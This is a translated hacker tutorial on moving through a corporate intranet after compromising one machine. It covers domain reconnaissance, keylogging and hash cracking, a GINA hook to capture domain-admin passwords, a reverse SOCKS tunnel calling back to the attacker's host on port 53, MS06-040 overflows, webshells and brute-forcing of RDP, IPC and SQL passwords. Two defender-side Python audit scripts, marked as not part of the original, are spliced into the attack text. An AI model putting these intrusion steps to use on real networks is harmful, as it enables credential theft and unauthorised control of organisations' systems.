Author: chenling rose
By now many people will have formed a concept of the intranet. On large networks the externally facing websites or servers are not necessarily useful; of course, the Internet-facing side is also a breakthrough point, and most of the time that is where we start. As security keeps being reinforced, however, that has become increasingly difficult. So how do hackers usually carry out intranet penetration, and how does intranet penetration connect with social engineering? Today we mainly describe the common operating methods hackers use in intranet penetration. For how to obtain an intranet machine in the first place, please refer to my previous article, "Intranet penetration: how to open a breakthrough".
Penetration is a process of information gathering, exploitation, thinking, and breakthrough. First, what should we do after we get an intranet machine? Information gathering, of course.
I. Information gathering
1. What is the identity of the current machine's owner: customer service, sales, developer, or administrator? What does a customer service person do and how do they contact others? What are the developers developing, do they contact the administrator, and do they hold certain Internet management permissions or intranet test servers? If so, the test server can be tested over the intranet. If it is a customer service or salesperson's machine, it will hold the contact information of the whole company or network, so make full use of your imagination. The machine in this example is an administrator's machine.
2. Analysis of the current network structure: is it a domain structure or a VLAN-based structure? Most large networks use a domain structure. Generally, the Internet-facing servers sit behind hardware firewalls, and some machines on the intranet can only be connected to by MAC address. So let's first look at the intranet:
C:\WINNT\system32> net view
Server Name Description
-------------------------------------------------------------------------------
NAS 4 Bay SATA
NAS 4 Bay SATA
Akira-wu
...
First use net view to check the intranet. The machines listed are all connected within the network structure, but they are not necessarily all on the same network segment, so ping the IP addresses of these machines to work out which network segments exist.
3. Understand the role of the local machine in the network
Run ipconfig /all first to check whether it is in a domain.
From the output we can see that there is a domain xxxx. From the intranet IP address, there should still be many segments; the intranet is large. Ping the domain name xxxx to obtain the IP address of the domain server.
Let's take a look at the role of the local machine in the domain:
It seems to be just an ordinary domain user. Let's take a look at the users in the domain.
...
There are many users in the domain, so let's look at who the domain administrators are:
We have now obtained rough information about the intranet. Next, we make further use of it.
II. Information utilization:
1. First, several necessary measures should be taken on the intranet machine that has been occupied:
1) Keylogging: record the logon passwords that may be typed; this is useful.
2) Capture the hashes and crack the passwords, then check whether the passwords follow a pattern; the same passwords can also be tried on other machines to see whether they are shared.
3) GINA. The point of this step is not to record the current user's password but the logon password of the domain administrator, because the domain administrator has permission to log on to every user's machine below him, and GINA can record that logon. Once the domain administrator's password has been recorded, all machines in the domain can be controlled over the intranet.
4) Leave a backup installation file or backup drive on a standby server, in case the other server is reinstalled.
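A defender-side check for step 3), added here as an example and not part of the original article: Winlogon loads whatever DLL the GinaDLL value under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon names (msgina.dll from system32 when the value is absent), so a redirected value is the artifact to audit. The key path and the default DLL are real; the sample `reg query` exports, the domain name XXXX and the DLL name hooked_gina.dll are constructed placeholders.

```python
"""Check a Winlogon registry export for a replaced GINA DLL."""
import ntpath
import re

# Winlogon loads the DLL named by the GinaDLL value under
# HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon; when the
# value is absent the stock msgina.dll from system32 is used.
DEFAULT_GINA = "msgina.dll"

def parse_reg_query(text: str) -> dict:
    """Parse `reg query` style lines ('    Name    REG_SZ    data')."""
    values = {}
    for line in text.splitlines():
        m = re.match(r"\s+(\S+)\s+(REG_\w+)\s*(.*)$", line)
        if m:
            values[m.group(1).lower()] = (m.group(2), m.group(3).strip())
    return values

def audit_gina(text: str, systemroot: str = r"C:\WINNT") -> list:
    """Return findings; an empty list means the GINA setting looks stock."""
    entry = parse_reg_query(text).get("ginadll")
    if entry is None:
        return []                      # value absent: default msgina.dll
    _, data = entry
    name = ntpath.basename(data).lower()
    directory = ntpath.dirname(data).lower()
    expected_dir = ntpath.join(systemroot, "system32").lower()
    if name != DEFAULT_GINA:
        return [f"GinaDLL points at a non-default DLL: {data}"]
    if directory and directory != expected_dir:
        return [f"msgina.dll loaded from an unexpected directory: {data}"]
    return []

# Constructed sample exports modelled on `reg query` of the Winlogon key
SAMPLE_CLEAN = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
    DefaultDomainName    REG_SZ    XXXX
    GinaDLL    REG_SZ    C:\WINNT\system32\msgina.dll
"""
# hooked_gina.dll is a placeholder name for a password-stealing GINA that
# chains the real msgina.dll
SAMPLE_HOOKED = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
    GinaDLL    REG_SZ    C:\WINNT\system32\hooked_gina.dll
"""

if __name__ == "__main__":
    for label, sample in (("clean", SAMPLE_CLEAN), ("hooked", SAMPLE_HOOKED)):
        print(label, audit_gina(sample) or "no findings")
```

On Windows XP the system root is C:\WINDOWS, so pass `systemroot` accordingly.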
2. Bouncing a SOCKS proxy.
In intranet penetration it is necessary to bounce a SOCKS proxy back out. We all know that lcx is used to forward ports, but few people seem to bounce a proxy back directly and connect through it. Because we want to connect to machines on the intranet, connecting through transit ports one at a time is not feasible, and there is no way to enable a proxy on the currently controlled machine since it sits on the intranet. So we use the bounce-proxy method. Everyone actually knows this method.
First, listen on the local machine:
C:\> hd-s-listen 53 1180
[+] Listening ConnectBack Port 53 ......
[+] Listen OK!
[+] Listening Socks5 Agent Port 1180 ......
[+] Listen2 OK!
[+] Waiting for MainSocket on port: 53 ......
This command accepts the connect-back on port 53 and serves the SOCKS5 proxy on port 1180.
Run the following command on the target machine:
C:\RECYCLER> hd-s-connect x.x 53
[+] MainSocket Connect to x.x: 53 Success!
[+] Send Main Command OK!
[+] Recv Main Command OK!
[+] Send Main Command again OK!
The x.x above is your Internet IP address, and the following shows what you see when the bounced proxy comes back.
C:\> hd-s-listen 53 1180
[+] Listening ConnectBack Port 53 ......
[+] Listen OK!
[+] Listening Socks5 Agent Port 1180 ......
[+] Listen2 OK!
[+] Waiting for MainSocket on port: 53 ......
[+] Recv Main Command Echo OK!
[+] Send Main Command Echo OK!
[+] Recv Main Command Echo again OK!
[+] Get a MainSocket on port 53 from x.x ......
[+] Waiting Client on Socks5 Agent Port: 1180 ....
At this point it is working. Next, install SocksCap on your local machine and configure it.
SocksCap is configured under "File" - "Settings" on its console. The programs you want to proxy can be dragged directly into the console, and those programs can then reach the machines on the intranet. For example, you can use mstsc directly to connect to port 3389 of other intranet machines and try passwords or log on to the management, or use an MSSQL client to connect to port 1433 on the intranet and try a weak sa password. In short, the SOCKS bounce is a bridge between the intranet machine you have already controlled and the other machines on the intranet.
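On the defender's side, the bounce proxy leaves a distinctive trace on the controlled host: a long-lived outbound TCP session to an Internet address on port 53, which is not how a workstation normally does DNS (UDP to its configured resolvers). An added example, not from the original article, that flags such sessions in constructed `netstat -ano` output (Windows XP and later print the PID column); the internal ranges, the resolver address 10.1.2.10 and the public address 198.51.100.7 are assumptions and placeholders.

```python
"""Flag connect-back sessions on TCP port 53 in `netstat -ano` output."""
import ipaddress

# Assumed internal ranges of the organisation (constructed for this example)
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
# Resolver the workstation is configured to use (constructed)
APPROVED_RESOLVERS = {ipaddress.ip_address("10.1.2.10")}

def parse_netstat(text: str) -> list:
    """Parse `netstat -ano` rows into (proto, local, foreign, state, pid)."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if parts[:1] == ["TCP"] and len(parts) == 5:
            proto, local, foreign, state, pid = parts
        elif parts[:1] == ["UDP"] and len(parts) == 4:   # UDP rows have no State
            proto, local, foreign, pid = parts
            state = ""
        else:
            continue                                     # header or blank line
        rows.append((proto, local, foreign, state, int(pid)))
    return rows

def suspicious_dns_port_sessions(text: str) -> list:
    """(pid, foreign) for ESTABLISHED TCP sessions to port 53 on addresses
    outside the internal ranges that are not an approved resolver."""
    hits = []
    for proto, _local, foreign, state, pid in parse_netstat(text):
        if proto != "TCP" or state != "ESTABLISHED":
            continue
        host, _, port = foreign.rpartition(":")
        if port != "53":
            continue
        try:
            addr = ipaddress.ip_address(host)
        except ValueError:
            continue                      # e.g. bracketed IPv6 literal
        if addr in APPROVED_RESOLVERS or any(addr in n for n in INTERNAL_NETS):
            continue
        hits.append((pid, foreign))
    return hits

# Constructed sample; 198.51.100.7 stands in for the attacker's "x.x" address
SAMPLE = """
  Proto  Local Address          Foreign Address        State           PID
  TCP    10.1.2.34:1055         198.51.100.7:53        ESTABLISHED     1844
  TCP    10.1.2.34:1070         10.1.2.10:53           ESTABLISHED     1024
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       820
  UDP    10.1.2.34:1060         *:*                                    1024
"""
```

The PID returned (1844 in the sample) is what to map to a process name with the task list; a tunnel process living in a directory such as C:\RECYCLER, as in the session above, is the follow-up to look at.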
III. Thinking:
The information is available and the channel is available. What should we do next?
1. Intranet overflows. By scanning the intranet, identify the Win2000 machines and use MS06-040 to carry out the overflow.
2. Intranet web. After scanning the intranet, open the intranet web sites in IE through SocksCap and use web injection or upload on the intranet to obtain a webshell and escalate privileges.
3. Try to guess intranet NT passwords through IPC or 3389, together with the password information already gathered. Of course, this requires patience, but it is also very useful.
4. Guess weak SQL passwords. Through the SocksCap console, use a SQL client to connect to the intranet machines with 1433 or 3306 open.
5. Intranet sniffing is not recommended.
6. Active session hijacking on the intranet, which is long and difficult. Details will be given next time.
IV. Breakthrough:
Breakthrough is the stage that tests experience and thinking: using the information already mastered to break through the hard spots. For example, how to get the first intranet server to gain a foothold, how to get from the intranet to the machine authorized to reach the Internet, and how to get the Internet password.
Once we have a foothold on the internal network, quickly identifying the administrator's machine is extremely important. Generally, the administrator's machine can be recognized from its machine name; names such as andy, admin, peter and kater are common. In a domain environment, as long as we have the domain controller password we can connect to the administrator's machine directly with IPC. In a non-domain environment, we can also test the server's password on the intranet and try the administrator's password.
During the breakthrough, the analysis of intranet databases and web applications is very important. There is a lot of useful information in the databases, and the connections and functions of the web databases also help further analysis. In short, only flexible use and divergent thinking in this process lead to further breakthroughs and control.
Hacking and security are in conflict; only by knowing the attacker's methods can you better maintain intranet security. The above are the common intranet penetration techniques used by hackers; my knowledge is limited and the text is rough, so please bear with me. This article is only for beginners.
By rose of ncph